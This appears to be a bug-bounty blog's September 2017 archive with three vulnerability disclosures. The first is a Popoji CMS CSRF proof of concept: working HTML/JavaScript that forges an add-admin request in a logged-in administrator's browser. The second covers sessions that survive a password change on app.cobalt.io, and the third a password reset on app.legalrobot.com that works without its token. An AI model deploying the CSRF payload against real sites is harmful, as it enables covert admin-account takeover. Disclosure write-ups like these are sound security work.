Posts

Showing posts from September, 2017

Missing CSRF Token On Add Admin [Popoji CMS]

Description: This happens because the "add admin" request carries no CSRF token, so any web page that a logged-in administrator visits can submit that request on their behalf using the administrator's session cookie.

Step To Reproduce:

```html
<script>
function getMe() {
  // Forge the "add admin" request; the browser attaches the victim's session cookie.
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://root/popoji/poadmin/route.php?mod=user&act=addnew", true);
  xhr.withCredentials = true;
  // A form-encoded body is a "simple" request, so no CORS preflight is sent.
  xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xhr.send('username=root&nama_lengkap=test&password=Mypass1337&repeatpass=Mypass1337&email=nosashandy21%40gmail.com&no_telp=083833232954&level=1');
}
</script>
<button onclick="getMe();">Let's Rock</button>
```

1. Save the code to an .html file.
2. Upload it to a host.
3. Have a logged-in administrator open the page and press the button.

The browser blocks the attacker's page from reading the cross-origin response, but the POST itself is still delivered with the victim's cookies, and the state change is all the attack needs.

Video: https://www.youtube.com/watch?v=1FXXuSiB6jo

Fix & Mitigation: require an unpredictable per-session CSRF token on every request that performs a sensitive action, and reject the request when the token is missing or does not match. Setting the session cookie with SameSite=Lax or Strict adds defense in depth, but the token check is the fix.

Note: they gave me permission to disclose it, and th

Session not expired when password has been changed [app.cobalt.io]

Description: When the user changes their password from one platform (browser), sessions on the other platform stay logged in and can still edit the profile. A password change should invalidate every other existing session; otherwise an attacker who already holds a stolen session keeps access after the victim rotates the password.

POC:
1. Log in on Mozilla Firefox.
2. Log in on Chrome.
3. Change the password on Chrome.
4. Go back to Firefox: you are still able to access the account.
5. You can still edit the profile.

Video: https://youtu.be/Cz2zh7w4n6M (unlisted)

Bounty:

Note: I asked app.cobalt.io for permission to write about it on my blog, and they gave me permission, so I write it here. Hope you enjoy~

Password Reset Token Issue [app.legalrobot.com]

Summary: The password can still be changed without the reset token.

Step to Reproduce:
1. Request a password reset link.
2. Open the email and click the password reset link, e.g. https://app.legalrobot.com/password-reset/token?v=uWe_yFJS0-N9fIk0nG0b0NZ70lkwNNi7RdUZu0KhiaX
3. Remove the token and use the link https://app.legalrobot.com/password-reset
4. Observe that you are able to reset the password without the token.

Fix: A password reset must only be accepted together with a valid, unexpired, single-use token, and the token itself should determine which account is reset; a request with the token missing or empty must be rejected outright.

Reference: https://hackerone.com/reports/253934

At first my report got N/A, then I explained a little bit and got a $20 bounty, yay. You can see my original report at https://hackerone.com/reports/265775. Thanks,